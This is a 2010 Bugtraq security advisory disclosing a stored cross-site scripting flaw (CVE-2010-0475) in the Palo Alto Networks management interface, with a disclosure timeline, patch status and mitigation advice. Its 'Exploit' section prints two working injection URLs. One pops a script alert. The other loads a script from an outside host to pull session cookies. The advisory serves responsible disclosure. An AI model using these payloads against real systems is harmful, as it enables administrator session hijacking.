[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
- From: jeromie@xxxxxxxxxxxxx
- Date: 12 May 2010 16:34:26 -0000
Class: Cross-Site Scripting (XSS) Vulnerability
CVE: CVE-2010-0475
Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response: 2/18/2010
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
COBIT & ITIL Certified
President- San Diego Open Web Application Security Project (OWASP)
Vice President- San Diego Information Audit & Control Association
(ISACA)
SANS Mentor
LinkedIn: www.linkedin.com/in/securityassessment
Blog: www.JeromieJackson.com
Twitter: www.twitter.com/Security_Sifu
Validated Vulnerable:
Latest Version Per December 31, 2009
Discussion:
A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo
Alto interface. By crafting a URL that includes XSS code it is possible to
inject malicious data, redirect the user to a bogus replica of the real
website, or other nefarious activity.
Exploit:
Single Line working-
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>
&admin-role=%5Bobject+Object%5D&bSubmit=O
WORKING FOR REDIRECT TO LOAD cookies into URL.
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS
SRC="http://www.jeromiejackson.com/tryme.js";></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O
Solution:
A patch will be required from the vendor. It is recommended a routine to
sanitize user input be consistently implemented throughout the application to
mitigate other such occurrences within the application.
References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet